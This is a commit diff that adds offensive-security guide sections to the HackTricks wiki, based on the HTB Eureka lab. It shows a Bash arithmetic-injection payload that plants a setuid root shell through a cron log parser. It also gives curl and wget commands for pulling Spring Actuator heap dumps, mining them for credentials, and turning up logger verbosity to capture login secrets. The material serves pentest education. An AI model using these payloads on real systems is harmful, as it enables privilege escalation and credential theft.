Merge pull request #1373 from HackTricks-wiki/update_HTB_Eureka__From_Actuator_HeapDump_to_SSH__credent_20250830_182823

carlospolop · web-flow · commit f4322c59244f · 2025-09-03T18:02:18.000+02:00
HTB Eureka From Actuator HeapDump to SSH, credential capture...
diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md
@@ -416,6 +416,30 @@ Read the following page for more wildcard exploitation tricks:
 wildcards-spare-tricks.md
 {{#endref}}
 
+
+### Bash arithmetic expansion injection in cron log parsers
+
+Bash performs parameter expansion and command substitution before arithmetic evaluation in ((...)), $((...)) and let. If a root cron/parser reads untrusted log fields and feeds them into an arithmetic context, an attacker can inject a command substitution $(...) that executes as root when the cron runs.
+
+- Why it works: In Bash, expansions occur in this order: parameter/variable expansion, command substitution, arithmetic expansion, then word splitting and pathname expansion. So a value like `$(/bin/bash -c 'id > /tmp/pwn')0` is first substituted (running the command), then the remaining numeric `0` is used for the arithmetic so the script continues without errors.
+
+- Typical vulnerable pattern:
+  ```bash
+  #!/bin/bash
+  # Example: parse a log and "sum" a count field coming from the log
+  while IFS=',' read -r ts user count rest; do
+      # count is untrusted if the log is attacker-controlled
+      (( total += count ))     # or: let "n=$count"
+  done < /var/www/app/log/application.log
+  ```
+
+- Exploitation: Get attacker-controlled text written into the parsed log so that the numeric-looking field contains a command substitution and ends with a digit. Ensure your command does not print to stdout (or redirect it) so the arithmetic remains valid.
+  ```bash
+  # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim):
+  $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0
+  # When the root cron parser evaluates (( total += count )), your command runs as root.
+  ```
+
 ### Cron script overwriting and symlink
 
 If you **can modify a cron script** executed by root, you can get a shell very easily:
@@ -1682,6 +1706,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md
 - [https://linuxconfig.org/how-to-manage-acls-on-linux](https://linuxconfig.org/how-to-manage-acls-on-linux)
 - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
 - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/)
-
+- [0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
+- [GNU Bash Reference Manual – Shell Arithmetic](https://www.gnu.org/software/bash/manual/bash.html#Shell-Arithmetic)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/spring-actuators.md b/src/network-services-pentesting/pentesting-web/spring-actuators.md
@@ -68,4 +68,80 @@ Connection: close
 
 
 
-{{#include ../../banners/hacktricks-training.md}}
+## HeapDump secrets mining (credentials, tokens, internal URLs)
+
+If `/actuator/heapdump` is exposed, you can usually retrieve a full JVM heap snapshot that frequently contains live secrets (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, etc.).
+
+- Download and quick triage:
+  ```bash
+  wget http://target/actuator/heapdump -O heapdump
+  # Quick wins: look for HTTP auth and JDBC
+  strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
+  # Decode any Basic credentials you find
+  printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
+  ```
+
+- Deeper analysis with VisualVM and OQL:
+  - Open heapdump in VisualVM, inspect instances of `java.lang.String` or run OQL to hunt secrets:
+    ```
+    select s.toString() 
+    from java.lang.String s 
+    where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
+    ```
+
+- Automated extraction with JDumpSpider:
+  ```bash
+  java -jar JDumpSpider-*.jar heapdump
+  ```
+  Typical high-value findings:
+  - Spring `DataSourceProperties` / `HikariDataSource` objects exposing `url`, `username`, `password`.
+  - `OriginTrackedMapPropertySource` entries revealing `management.endpoints.web.exposure.include`, service ports, and embedded Basic-Auth in URLs (e.g., Eureka `defaultZone`).
+  - Plain HTTP request/response fragments including `Authorization: Basic ...` captured in memory.
+
+Tips:
+- Use a Spring-focused wordlist to discover actuator endpoints quickly (e.g., SecLists spring-boot.txt) and always check if `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, and `/actuator/configprops` are also exposed.
+- Credentials from heapdump often work for adjacent services and sometimes for system users (SSH), so try them broadly.
+
+
+## Abusing Actuator loggers/logging to capture credentials
+
+If `management.endpoints.web.exposure.include` allows it and `/actuator/loggers` is exposed, you can dynamically increase log levels to DEBUG/TRACE for packages that handle authentication and request processing. Combined with readable logs (via `/actuator/logfile` or known log paths), this can leak credentials submitted during login flows (e.g., Basic-Auth headers or form parameters).
+
+- Enumerate and crank up sensitive loggers:
+  ```bash
+  # List available loggers
+  curl -s http://target/actuator/loggers | jq .
+
+  # Enable very verbose logs for security/web stacks (adjust as needed)
+  curl -s -X POST http://target/actuator/loggers/org.springframework.security \
+       -H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
+  curl -s -X POST http://target/actuator/loggers/org.springframework.web \
+       -H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
+  curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
+       -H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
+  ```
+
+- Find where logs are written and harvest:
+  ```bash
+  # If exposed, read from Actuator directly
+  curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
+
+  # Otherwise, query env/config to locate file path
+  curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
+  ```
+
+- Trigger login/authentication traffic and parse the log for creds. In microservice setups with a gateway fronting auth, enabling TRACE for gateway/security packages often makes headers and form bodies visible. Some environments even generate synthetic login traffic periodically, making harvesting trivial once logging is verbose.
+
+Notes:
+- Reset log levels when done: `POST /actuator/loggers/<logger>` with `{ "configuredLevel": null }`.
+- If `/actuator/httpexchanges` is exposed, it can also surface recent request metadata that may include sensitive headers.
+
+
+## References
+
+- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations)
+- [VisualVM](https://visualvm.github.io/)
+- [JDumpSpider](https://github.com/whwlsfb/JDumpSpider)
+- [0xdf – HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html)
+
+{{#include ../../banners/hacktricks-training.md}}
